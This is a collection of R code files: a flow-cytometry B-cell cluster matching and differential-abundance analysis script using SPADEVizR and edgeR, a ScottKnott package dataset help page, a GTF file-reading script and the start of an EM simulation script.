  } else if (grp2_floor > grp1_floor) {
    Grp2_data[, marker_col] <- Grp2_data[, marker_col] - (grp2_floor - grp1_floor)
  }
}
# Stack both groups into a single table for downstream matching.
grouped_file <- rbind(Grp1_data, Grp2_data)
### MAKE SURE THE COLUMN V ("CXCR4" has the X in it. Often group 2 sheet will read "CCR4")
# The matching file lists Group 1 clusters (first half of rows) and Group 2
# clusters (second half) together with the shared "new_name" each maps to.
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
# Append a column and build fully-qualified cluster names.
# NOTE(review): assumes exactly the first half of rows are Grp1 and the second
# half Grp2 — confirm the matching file is laid out that way.
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
  matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
  matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
# Keep (qualified name, new_name); the qualified name becomes "Cluster".
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
# Look up each grouped_file cluster's shared name (NA when unmatched).
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
# Move new_cluster_name next to the identifying columns.
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
# Unmatched clusters keep their original (qualified) cluster name.
for (i in 1: nrow(grouped_file)){
  if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
    grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 20)
  }
}
# #delete the unmatched clusters
# grouped_file = grouped_file[!is.na(grouped_file$new_cluster_name), ]
grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
# Replace the Cluster column with new_cluster_name via a temporary duplicate
# column; index 39 must equal (number of markers + 2) — adjust per panel.
# The duplicated column produced by c(39, 1:ncol) is later dropped as
# "Cluster_new.1".
grouped_file = cbind(grouped_file, 0)
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
# Full combined phenotype table (matched AND unmatched clusters).
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", row.names=FALSE)
##############################################
# Build the "Abundance" input for the grouped analysis: per-sample cluster
# frequencies (percent of each sample's total cells) for both groups.
##############################################
# Convert a vector of counts to percentages of its own total.
tmp_percent <- function(x) (x / sum(x)) * 100
# Source tables were exported by the scatter-plot sections above.
Grp1_file <- "Data for Scatter Plot Group 1.txt"
Grp2_file <- "Data for Scatter Plot Group 2.txt"
# Group 1: 185 clusters x (name + 16 sample columns); prefix and sanitize
# the cluster names so they line up with the matching file.
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data <- as.data.frame(Grp1_data[1:185, 1:17])
Grp1_data$Cluster <- gsub(" ", "_", paste0("Grp1_", Grp1_data$Cluster))
for (sample_col in 2:ncol(Grp1_data)) {
  Grp1_data[, sample_col] <- tmp_percent(Grp1_data[, sample_col])
}
# Group 2: 151 clusters x (name + 15 sample columns); same treatment.
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data <- as.data.frame(Grp2_data[1:151, 1:16])
Grp2_data$Cluster <- gsub(" ", "_", paste0("Grp2_", Grp2_data$Cluster))
for (sample_col in 2:ncol(Grp2_data)) {
  Grp2_data[, sample_col] <- tmp_percent(Grp2_data[, sample_col])
}
# Re-read the matching file and qualify its cluster names (same convention as
# the phenotype-matching section above: first half Grp1, second half Grp2).
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
  matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
  matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
# Assemble one abundance row per matched cluster pair: the Grp1 sample columns
# cbind-ed with the Grp2 sample columns.
# Seed grouped_data with the new_name == 1 pair; the loop below revisits every
# new_name (including 1), and the duplicate seed row is dropped with [-1, ].
grouped_data = data.frame(tmp_name = 0)
tmp_data = matching_file[matching_file$new_name == 1,]
Grp1_tmp_data = Grp1_data[Grp1_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp1_tmp_data) = Grp1_tmp_data$Cluster
Grp1_tmp_data$Cluster = NULL
Grp2_tmp_data = Grp2_data[Grp2_data$Cluster %in% tmp_data$Cluster, ]
rownames(Grp2_tmp_data) = Grp2_tmp_data$Cluster
Grp2_tmp_data$Cluster = NULL
tmp_combined_data_1 = cbind(Grp1_tmp_data, Grp2_tmp_data)
#tmp_combined_data_1 = rbind(Grp1_tmp_data, Grp2_tmp_data)
#rownames(tmp_combined_data_1) = paste("Cluster_", 1, sep = "")
grouped_data = tmp_combined_data_1
# NOTE(review): cbind + single-string rownames assignment assumes each
# new_name maps to exactly ONE Grp1 cluster and ONE Grp2 cluster; a
# one-to-many match would error or mis-align — confirm the matching file.
for (i in unique(matching_file$new_name)){
  #i=1
  tmp_data = matching_file[matching_file$new_name == i,]
  Grp1_tmp_data = Grp1_data[Grp1_data$Cluster %in% tmp_data$Cluster, ]
  rownames(Grp1_tmp_data) = Grp1_tmp_data$Cluster
  Grp1_tmp_data$Cluster = NULL
  Grp2_tmp_data = Grp2_data[Grp2_data$Cluster %in% tmp_data$Cluster, ]
  rownames(Grp2_tmp_data) = Grp2_tmp_data$Cluster
  Grp2_tmp_data$Cluster = NULL
  tmp_combined_data = cbind(Grp1_tmp_data, Grp2_tmp_data)
  rownames(tmp_combined_data) = paste("Cluster_", i, sep = "")
  grouped_data = rbind(grouped_data, tmp_combined_data)
}
# Drop the duplicated seed row (first row).
grouped_data = grouped_data[-1, ]
#grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
# Abundance sheet for the combined SPADEVizR analysis; row names carry the
# matched cluster ids.
write.xlsx(grouped_data, "Abundance DR3 Day 51 B Cell Data.xlsx", row.names=TRUE)
#####################################################################################################
# MODIFIED PCP GENERATOR FOR PHENOTYPE
# Re-load the combined (all background) phenotype sheet written above, to be
# drawn with phenoViewer_modified_v2.
#####################################################################################################
setwd(PrimaryDirectory)
##### The generated phenotype sheet must have been saved as an .xlsx file.
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells ALL BACKGROUND.xlsx", sheet = "Sheet 1")
View(Phenotype)
# Hard-coded extent (5225 x 37) must match the sheet size for this experiment.
cluster.phenotypes <- as.data.frame(Phenotype[1:5225,1:37])
# Drop the third column (not used by the viewer).
cluster.phenotypes <- cluster.phenotypes[,-3]
# Draw a parallel-coordinate phenotype plot for one cluster: the selected
# cluster's mean marker expression in red over every cluster's mean profile
# in gray, averaged first per sample ("Term") then across samples.
#
# cluster.phenotypes : data.frame with columns Cluster, Term, then markers.
# samples            : optional subset of sample names (default: all).
# clusters           : the cluster id(s) to highlight in red.
# markers, show.mean, show.on_device, sort.markers : accepted for signature
#   compatibility with the SPADEVizR original but NOT used in this body.
#
# Returns the ggplot object invisibly after drawing it on the current device.
phenoViewer_modified_v2 <-function( cluster.phenotypes,
                                    samples = NULL,
                                    clusters,
                                    markers = NULL,
                                    show.mean = "only",
                                    show.on_device = TRUE,
                                    sort.markers = TRUE){
  if (is.null(samples)) {
    samples <- unique(cluster.phenotypes$Term)
    data <- cluster.phenotypes
  } else if (!all(samples %in% Results@sample.names)) {
    # NOTE(review): this branch references a global `Results` (capital R) that
    # is not defined in this script (only lowercase `results` exists), so
    # calling with a non-NULL `samples` would fail — confirm before using.
    stop("Error in phenoViewer: 'samples' parameter must contains only samples names\n Unknown sample names: ",
         paste(setdiff(unique(samples), Results@sample.names), collapse = " "))
  } else {
    data <- subset(Results@cluster.phenotypes, sample %in% samples, drop = FALSE)
    cluster.abundances <- Results@cluster.abundances[, samples, drop = FALSE]
  }
  data <- stats::na.omit(data)
  # Restrict to the highlighted cluster(s).
  clusters <- unique(clusters)
  clusters.select <- data[, "Cluster"] %in% clusters
  data <- data[clusters.select,]
  # Per-sample mean of each marker for the highlighted cluster, then long format.
  data <- plyr::ddply(data, c("Term"), function(df) {
    apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
  })
  data <- reshape2::melt(data, id = c("Term"), stringsAsFactors = FALSE)
  colnames(data) <- c("samples", "marker", "value")
  title <- paste("Cluster_", clusters, sep = "")
  # max.value/min.value are computed here but NOT used by the plot below,
  # which scales to the range of data_means$means instead.
  max.value <- -1
  min.value <- -1
  max.value <- max(c(data$value, data$upper.bound), na.rm = TRUE)
  min.value <- min(c(data$value, data$lower.bound), na.rm = TRUE)
  max.value <- max.value * (1 + sign(max.value) * 0.1)
  min.value <- min.value * (1 - sign(min.value) * 0.1)
  # Across-sample mean per marker for the highlighted cluster (red line data).
  means <- plyr::ddply(data,
                       c("marker"),
                       function(df){mean(df$value, na.rm = TRUE)})
  colnames(means) <- c("marker", "means")
  # Build the gray background: the per-marker mean profile of EVERY cluster.
  # The seed row of zeros is dropped afterwards with [-1, ].
  data_means <- data.frame(marker = 0, means= 0, clusters = 0)
  tmp_clusters<- unique(cluster.phenotypes$Cluster) ###### the cluster.phenotypes column must be named "Cluster" (capital C)
  for(i in tmp_clusters){
    tmp_data<- cluster.phenotypes
    tmp_clusters.select <- tmp_data[, "Cluster"] %in% i
    tmp_data <- tmp_data[tmp_clusters.select,]
    tmp_data <- plyr::ddply(tmp_data, c("Term"), function(df) {
      apply(df[, 3:ncol(df)], 2, mean, na.rm = TRUE)
    })
    tmp_data <- reshape2::melt(tmp_data, id = c("Term"), stringsAsFactors = FALSE)
    colnames(tmp_data) <- c("samples", "marker", "value")
    tmp_means <- plyr::ddply(tmp_data,
                             c("marker"),
                             function(df){mean(df$value, na.rm = TRUE)})
    colnames(tmp_means) <- c("marker", "means")
    tmp_means$clusters = i
    data_means = rbind(data_means, tmp_means)
  }
  data_means = data_means[-1, ]
  rescale_data_means = data_means
  # The highlighted cluster's rows within the background table (red line).
  rescale_means = data_means[data_means$clusters == clusters,]
  plot <- ggplot2::ggplot(data = rescale_data_means) +
    ggplot2::ggtitle(bquote(atop(.(title))))
  # Gray line per cluster (background), y axis scaled to all clusters' means.
  plot <- plot + ggplot2::geom_line(ggplot2::aes_string(x = "marker", y = "means", group = "clusters"),
                                    size = 0.4,
                                    alpha = 1,
                                    color = "#CCCCCC")+
    ggplot2::scale_y_continuous(limits = c(min(data_means$means), max(data_means$means)), breaks = round(seq(0, max(data_means$means), by = 1), 0)) +
    ggplot2::theme_bw()
  # Red line: the highlighted cluster's mean profile.
  plot <- plot + ggplot2::geom_line(data = rescale_means,
                                    ggplot2::aes_string(x = "marker", y = "means", group = 1),
                                    linetype = "solid",
                                    size = 1,
                                    color = "#FF6666")
  plot <- plot + ggplot2::theme(axis.text.x = ggplot2::element_text(angle = 90, hjust = 1, vjust = 0.5, face = "bold")) +
    ggplot2::theme(legend.text = ggplot2::element_text(size = 6),
                   legend.key = ggplot2::element_blank(),
                   plot.title = ggplot2::element_text(hjust=0.5)) +
    ggplot2::xlab("markers") +
    ggplot2::ylab("marker expressions") +
    ggplot2::guides(col = ggplot2::guide_legend(ncol = 1))
  # Draw on the active device and return the plot invisibly for reuse.
  grid::grid.draw(plot)
  invisible(plot)
}
# Export one phenotype image per matched (grouped) cluster id 1..31.
# To preview a single cluster interactively:
# phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
#                         clusters = "2887")
dir.create("Grouped_ClusterImages", showWarnings = FALSE)
setwd("Grouped_ClusterImages")
# Restrict to the numeric matched-cluster ids (unmatched clusters keep their
# "GrpX_Cluster_..." names and are excluded here).
a = cluster.phenotypes[which(cluster.phenotypes$Cluster %in% c(1:31)), ]
for (i in unique(a$Cluster)){
  # Consistency fix: paste() previously used its default sep = " ", producing
  # filenames with embedded spaces ("Cluster_ 1 .jpeg"); every other image
  # loop in this file uses sep = "", so do the same here -> "Cluster_1.jpeg".
  jpeg(paste("Cluster_", i, ".jpeg", sep = ""),
       width=2000,
       height=1500,
       res = 300)
  phenoViewer_modified_v2(cluster.phenotypes = cluster.phenotypes,
                          clusters = i)
  dev.off()
}
setwd(PrimaryDirectory)
##################################################
# Build the phenotype sheet for the grouped SPADEVizR analysis: re-read both
# groups' Sheet1 exports and align their marker baselines (same procedure as
# the matching script above).
##################################################
Grp1_file <- "Grp 1 DR3 D51 B Cells 20181205 K=35.txt"
Grp1_data <- read.table(Grp1_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp1_data$Cluster <- paste0("Grp1_Cluster_", Grp1_data$Cluster)
Grp2_file <- "Grp 2 DR3 D51 B Cells 20181205 K=26.txt"
Grp2_data <- read.table(Grp2_file, sep = "\t", header = TRUE, stringsAsFactors = FALSE)
Grp2_data$Cluster <- paste0("Grp2_Cluster_", Grp2_data$Cluster)
### Marker columns occupy 4:37 — adjust to the number of markers in the panel.
# Per marker, subtract the difference of the two groups' minima from the
# higher-baseline group so both batches share a common floor.
for (marker_col in 4:37) {
  grp1_floor <- min(Grp1_data[, marker_col])
  grp2_floor <- min(Grp2_data[, marker_col])
  if (grp1_floor > grp2_floor) {
    Grp1_data[, marker_col] <- Grp1_data[, marker_col] - (grp1_floor - grp2_floor)
  } else if (grp2_floor > grp1_floor) {
    Grp2_data[, marker_col] <- Grp2_data[, marker_col] - (grp2_floor - grp1_floor)
  }
}
# Stack both groups into the combined table used below.
grouped_file <- rbind(Grp1_data, Grp2_data)
# Apply the matching file (Grp1 clusters in the first half of rows, Grp2 in
# the second half, each with a shared new_name) to the combined table.
matching_file_name = "Matched Clusters DR3 Day 51 B Cell.txt"
#grouped_file = read.table(grouped_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = read.table(matching_file_name, sep = '\t', header = TRUE, stringsAsFactors = FALSE)
matching_file = cbind(matching_file, 0)
colnames(matching_file)[3] = "Cluster_new"
for(i in 1:(nrow(matching_file)/2)){
  matching_file$Cluster_new[i] = paste("Grp1_Cluster_", matching_file$Cluster[i], sep = "")
}
for(i in ((nrow(matching_file)/2)+1):nrow(matching_file)){
  matching_file$Cluster_new[i] = paste("Grp2_Cluster_", matching_file$Cluster[i], sep = "")
}
matching_file = matching_file[,c(3,1,2)]
matching_file$Cluster = NULL
colnames(matching_file)[1] = "Cluster"
# Look up each cluster's shared name (NA when unmatched).
grouped_file$new_cluster_name = matching_file$new_name[match(grouped_file$Cluster, matching_file$Cluster)]
grouped_file = grouped_file[, c(1, 2, ncol(grouped_file), 3:(ncol(grouped_file)-1))]
# Tag unmatched clusters with the 9-char prefix "Grp1_Clus"/"Grp2_Clus" so
# they can be filtered out below (unlike the ALL BACKGROUND export, this
# sheet keeps matched clusters only).
for (i in 1: nrow(grouped_file)){
  if(is.na(grouped_file$new_cluster_name[i]) == TRUE){
    grouped_file$new_cluster_name[i] = substr(grouped_file$Cluster[i], 1, 9)
  }
}
# Drop all unmatched clusters from both groups.
grouped_file = grouped_file[grouped_file$new_cluster_name != "Grp1_Clus", ]
grouped_file = grouped_file[grouped_file$new_cluster_name != "Grp2_Clus", ]
# Replace the Cluster column with new_cluster_name via a temporary duplicate
# column; index 39 = number of markers + 2 (adjust per panel). The duplicate
# created by c(39, 1:ncol) is dropped below as "Cluster_new.1".
grouped_file = cbind(grouped_file, 0)
colnames(grouped_file)[39] = "Cluster_new"
grouped_file = grouped_file[,c(39,1:ncol(grouped_file))]
grouped_file$Cluster = NULL
colnames(grouped_file)[1] = "Cluster"
grouped_file$Cluster = grouped_file$new_cluster_name
grouped_file$new_cluster_name = NULL
grouped_file$Cluster_new.1 = NULL
#grouped_file = grouped_file[order(grouped_file$new_cluster_name),]
# Phenotype sheet (matched clusters only) for the SPADEVizR analysis below.
write.xlsx(grouped_file, "Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", row.names=FALSE)
# FILE GENERATED ABOVE SERVES AS PHENOTYPE SHEET FOR SPADEVIZR ANALYSIS
##################################################
# SPADEVIZR ANALYSIS - FOR COMBINED GROUP DATA:
# Load the grouped abundance + phenotype sheets written above and build the
# SPADEVizR results object plus the four condition sample lists.
##################################################
Abundance <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
View(Abundance)
Phenotype <- read_excel("./Phenotype DR3 Day51 B Cells SPADEVIZR.xlsx", sheet = "Sheet 1")
View(Phenotype)
### Hard-coded extents (31x32 abundances, 961x37 phenotypes) must match the
### sheet sizes for this experiment.
cluster.abundances <- as.data.frame(Abundance[1:31,1:32])
rownames(cluster.abundances) <- cluster.abundances[,1]
cluster.abundances <- cluster.abundances[,-1]
cluster.phenotypes <- as.data.frame(Phenotype[1:961,1:37])
cluster.phenotypes <- cluster.phenotypes[,-3]
# Normalize cluster ids to "Cluster_<n>" so they match the abundance row names.
cluster.phenotypes$Cluster = paste("Cluster_", cluster.phenotypes$Cluster, sep ="")
results <- importResultsFromTables(cluster.abundances = cluster.abundances, cluster.phenotypes = cluster.phenotypes)
### Sample names per condition; copy the exact names from the console output
### of importResultsFromTables to keep them in sync.
# NOTE(review): Naive_Chal lists 7 samples (c01 appears only for Grp1, no
# GRP2 counterpart) while the other conditions list 8 — confirm this is
# intentional and not a missing sample.
Control <- c("c05_Grp1_DR3_D51_B.Cells._37p", "c05_GRP2_DR3_Day51_B.Cells._37p", "c06_Grp1_DR3_D51_B.Cells._37p", "c06_GRP2_DR3_Day51_B.Cells._37p", "c07_Grp1_DR3_D51_B.Cells._37p", "c07_GRP2_DR3_Day51_B.Cells._37p", "c08_Grp1_DR3_D51_B.Cells._37p", "c08_GRP2_DR3_Day51_B.Cells._37p")
Naive_Chal <- c("c01_Grp1_DR3_D51_B.Cells._37p", "c02_Grp1_DR3_D51_B.Cells._37p", "c02_GRP2_DR3_Day51_B.Cells._37p", "c03_Grp1_DR3_D51_B.Cells._37p", "c03_GRP2_DR3_Day51_B.Cells._37p", "c04_Grp1_DR3_D51_B.Cells._37p", "c04_GRP2_DR3_Day51_B.Cells._37p")
Vax_Chal <- c("c09_Grp1_DR3_D51_B.Cells._37p", "c09_GRP2_DR3_Day51_B.Cells._37p", "c10_Grp1_DR3_D51_B.Cells._37p", "c10_GRP2_DR3_Day51_B.Cells._37p", "c11_Grp1_DR3_D51_B.Cells._37p", "c11_GRP2_DR3_Day51_B.Cells._37p", "c12_Grp1_DR3_D51_B.Cells._37p", "c12_GRP2_DR3_Day51_B.Cells._37p")
Vax_Unchal <- c("c13_Grp1_DR3_D51_B.Cells._37p", "c13_GRP2_DR3_Day51_B.Cells._37p", "c14_Grp1_DR3_D51_B.Cells._37p", "c14_GRP2_DR3_Day51_B.Cells._37p", "c15_Grp1_DR3_D51_B.Cells._37p", "c15_GRP2_DR3_Day51_B.Cells._37p", "c16_Grp1_DR3_D51_B.Cells._37p", "c16_GRP2_DR3_Day51_B.Cells._37p")
### Differential abundant cluster (DAC) analysis with a volcano plot for each
### pairwise comparison of the four conditions.
## To tighten the threshold, change th.pvalue = 0.05 to 0.01 inside the helper.
# method.paired = FALSE runs an unpaired t-test; set TRUE for a paired test.
### Writes one CSV of cluster p-values and one TIFF volcano plot per
### comparison into a dedicated sub-directory.
dir.create("SpadevizR Analysis and Volcano Plots", showWarnings = FALSE)
setwd("SpadevizR Analysis and Volcano Plots")
# Run one DAC comparison end-to-end: identify differentially abundant
# clusters between two conditions, print and export the statistics table,
# and save the volcano plot.  Returns the DAC result object (invisibly) so
# the per-comparison globals below keep their original names/values.
run_dac_comparison <- function(condition1, condition2, csv_name, tiff_name) {
  dac <- identifyDAC(results, condition1 = condition1, condition2 = condition2,
                     th.pvalue = 0.05, th.fc = 1, method.paired = FALSE,
                     use.percentages = FALSE)
  # Explicit print so the table also shows when the script is source()d.
  print(dac@results)
  write.csv(dac@results, csv_name, row.names = FALSE)
  tiff(tiff_name, width = 2000, height = 1500, res = 300)
  SPADEVizR::plot(dac)
  dev.off()
  invisible(dac)
}
# All six pairwise comparisons; output file names unchanged from the original
# copy-pasted stanzas.
resultsDAC_CvNC  <- run_dac_comparison(Control,    Naive_Chal,
                                       "Control_v_Naive_Chal_DAC_p_values.csv",
                                       "Control vs Naive_chal.tiff")
resultsDAC_CvVU  <- run_dac_comparison(Control,    Vax_Unchal,
                                       "Control_v_Vax_Unchal_DAC_p_values.csv",
                                       "Control vs Vax_Unchal.tiff")
resultsDAC_NCvVC <- run_dac_comparison(Naive_Chal, Vax_Chal,
                                       "Naive_Chal_v_Vax_Chal_DAC_p_values.csv",
                                       "Naive_Chal vs Vax_Chal.tiff")
resultsDAC_VUvVC <- run_dac_comparison(Vax_Unchal, Vax_Chal,
                                       "Vax_Unchal_v_Vax_Chal_DAC_p_values.csv",
                                       "Vax_Unchal vs Vax_Chal.tiff")
resultsDAC_CvVC  <- run_dac_comparison(Control,    Vax_Chal,
                                       "Control_v_Vax_Chal_DAC_p_values.csv",
                                       "Control vs Vax_Chal.tiff")
resultsDAC_NCvVU <- run_dac_comparison(Naive_Chal, Vax_Unchal,
                                       "Naive_Chal_v_Vax_Unchal_DAC_p_values.csv",
                                       "Naive_Chal vs Vax_Unchal.tiff")
setwd(PrimaryDirectory)
###################################################
# Analysis with edgeR
###################################################
edgeR_analysis <- function(data_experiment, data_control, experiment_sample_size, control_sample_size, export_file_name){
#
# data_experiment = Vax_Chal.abundances
# data_control = Naive_Chal.abundances
# experiment_sample_size = 8
# control_sample_size = 7
# export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis"
tmp_cluster.abundances = cbind(data_experiment, data_control)
# Group assignment
conditions1 = rep("A", experiment_sample_size)
conditions2 = rep("B", control_sample_size)
conditions = c(conditions1, conditions2)
y <- DGEList(tmp_cluster.abundances)
## ------------------------------------------------------------------------
#Because data has been rescaled, cant use this function which removes any clusters with less than 5 cells
#keep <- aveLogCPM(y) >= aveLogCPM(5, mean(y$samples$lib.size))
#y <- y[keep,]
y = y
## ------------------------------------------------------------------------
design <- model.matrix(~factor(conditions))
y <- estimateDisp(y, design)
fit <- glmQLFit(y, design, robust=TRUE)
res <- glmQLFTest(fit, coef=2)
DAC = topTags(res, n=200, adjust.method="BH", sort.by="PValue", p.value=1)
print(DAC)
View(DAC)
write.csv(DAC, paste(export_file_name, ".csv", sep = ""),row.names = TRUE)
}
Vax_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Chal]
Naive_Chal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Naive_Chal]
Control.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Control]
Vax_Unchal.abundances = cluster.abundances[, colnames(cluster.abundances) %in% Vax_Unchal]
dir.create("EdgeR Analysis", showWarnings = FALSE)
setwd("EdgeR Analysis")
### Change data_experiment and data_control to sample names you want to compare as well as
### experiment_sample_size and control_sample_size to number of conditions in each sample
### finally, change export_file_name to depict groups being compared
edgeR_analysis(data_experiment = Vax_Chal.abundances,
data_control = Naive_Chal.abundances,
experiment_sample_size = 8,
control_sample_size = 7,
export_file_name = "Vax_Chal v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Vax_Chal.abundances,
data_control = Vax_Unchal.abundances,
experiment_sample_size = 8,
control_sample_size = 8,
export_file_name = "Vax_Chal v Vax_Unchal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
data_control = Naive_Chal.abundances,
experiment_sample_size = 8,
control_sample_size = 7,
export_file_name = "Control v Naive_Chal EdgeR Analysis")
edgeR_analysis(data_experiment = Control.abundances,
data_control = Vax_Unchal.abundances,
experiment_sample_size = 8,
control_sample_size = 8,
export_file_name = "Control v Vax_Unchal EdgeR Analysis")
setwd(PrimaryDirectory)
####################################
#SCATTER PLOT GENERATOR
###################################
Grouped_SheetFour <- read_excel("./Abundance DR3 Day 51 B Cell Data.xlsx", sheet = "Sheet 1")
write.table(Grouped_SheetFour, file = "Data for Scatter Plot Grouped.txt", sep = "\t",row.names = FALSE, col.names = TRUE)
#load data
data <- read.table("Data for Scatter Plot Grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
#data$Cluster <- gsub(" ", "_", data$Cluster, fixed = TRUE)
rownames(data) <- data$Cluster
data <- data[,-1]
#transpose the data for ploting
data <- t(data)
data <- as.data.frame(data)
#group assignment
group_data <- read.table("group assignment for grouped.txt", header = TRUE, sep = "\t", stringsAsFactors = FALSE)
group_data$sample <- trim(group_data$sample)
group_data$sample = gsub(" ", ".", group_data$sample, fixed = TRUE)
data$group <- group_data$group#[match(rownames(data), group_data$sample)]
data <- data[, c(ncol(data), 1:(ncol(data)-1))]
dir.create("Grouped_Scatterplots", showWarnings = FALSE)
setwd("Grouped_Scatterplots")
x_order = factor(data$group, levels=c("Naive Unchallenged", "Naive Challenged", "Vax Unchallenged","Vax Challenged"), ordered=TRUE)
for(i in 2:ncol(data)){
scatter_plot <-
ggplot(data, aes_string(x = x_order, fill = "group", y = colnames(data)[i]))+
geom_dotplot(binaxis = "y", stackdir = "centerwhole") +
stat_summary(fun.y = "median", size=0.5, geom = 'line', aes(group=1))+
stat_summary(
fun.ymin = function(z) { quantile(z,0.25) },
fun.ymax = function(z) { quantile(z,0.75) },
fun.y = median,
width = 0.2,
geom = "errorbar") +
theme(axis.text.x = element_text(size = 25, face = "bold", vjust = 1.0, hjust = 1.0, angle = 45)) +
theme(axis.text.y = element_text(size = 20, face = "bold", vjust = 0.5, hjust = 0.5, angle = 0)) +
theme(legend.position = "none")
ggsave(scatter_plot,
width = 20,
height = 15,
dpi = 300,
filename = paste(colnames(data)[i], ".jpeg", sep = ""))
}
setwd(PrimaryDirectory)
### Displays an heatmap representation summarizing phenotypes for the overall dataset
heatmapViewer(results)
####################################################################################################################################################################################
#################################################################################################################################################################################### |
\name{RCBD}
\alias{RCBD}
\title{
Randomized Complete Block Design (RCBD)
}
\description{
A \code{list} illustrating the resources of \pkg{ScottKnott} package
related to Randomized Complete Block Design (\samp{RCBD}).
}
\usage{
data(RCBD)
RCBD
}
\details{
A simulated data to model a Randomized Complete Block Design (\samp{RCBD}) of 5
factor levels, 4 blocks and 4 factor levels repetitions one in each block.
}
\keyword{datasets}
| /man/RCBD.Rd | no_license | jcfaria/ScottKnott | R | false | false | 475 | rd | \name{RCBD}
\alias{RCBD}
\title{
Randomized Complete Block Design (RCBD)
}
\description{
A \code{list} illustrating the resources of \pkg{ScottKnott} package
related to Randomized Complete Block Design (\samp{RCBD}).
}
\usage{
data(RCBD)
RCBD
}
\details{
A simulated data to model a Randomized Complete Block Design (\samp{RCBD}) of 5
factor levels, 4 blocks and 4 factor levels repetitions one in each block.
}
\keyword{datasets}
|
##prueba_lectura_1.r
##2015-04-127dmontaner@cipf.es
##vemos velocidades de lectura
date ()
Sys.info ()[c("nodename", "user")]
commandArgs ()
rm (list = ls ())
R.version.string ##"R version 3.2.0 (2015-04-16)"
###DATOS
setwd ("../data")
dir ()
## ## R
## system.time (gtf <- read.table (file = "Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t", quote = "", as.is = TRUE))
## sapply (gtf, class)
## dim (gtf)
## DATA TABLE
library (data.table)
system.time (gtf <- fread ("Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t"))
sapply (gtf, class)
dim (gtf)
gtf
gtf2 <- gtf[V3=="gene"]
dim (gtf2)
write.table (gtf2, file = "gtf_gen.gtf", append = FALSE, quote = FALSE, sep = "\t", row.names = FALSE, col.names = FALSE)
###EXIT
warnings ()
sessionInfo ()
q ("no")
| /clases/2015_04_27_practical_local_blast/datos_simulacion/limpia_gtf.r | no_license | dmontaner-teaching/bioinformatics_intro_course | R | false | false | 775 | r | ##prueba_lectura_1.r
##2015-04-127dmontaner@cipf.es
##vemos velocidades de lectura
date ()
Sys.info ()[c("nodename", "user")]
commandArgs ()
rm (list = ls ())
R.version.string ##"R version 3.2.0 (2015-04-16)"
###DATOS
setwd ("../data")
dir ()
## ## R
## system.time (gtf <- read.table (file = "Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t", quote = "", as.is = TRUE))
## sapply (gtf, class)
## dim (gtf)
## DATA TABLE
library (data.table)
system.time (gtf <- fread ("Homo_sapiens.GRCh38.79.gtf", header = FALSE, sep = "\t"))
sapply (gtf, class)
dim (gtf)
gtf
gtf2 <- gtf[V3=="gene"]
dim (gtf2)
write.table (gtf2, file = "gtf_gen.gtf", append = FALSE, quote = FALSE, sep = "\t", row.names = FALSE, col.names = FALSE)
###EXIT
warnings ()
sessionInfo ()
q ("no")
|
#setwd("/netscr/deelim")
setwd("C:/Users/David/Desktop/Research/EM")
source("Pan EM.R") # Pan method
library(MASS)
# Simulations to choose K
sim=100
choose_k<-rep(0,times=sim)
n=20
g=100
k=4
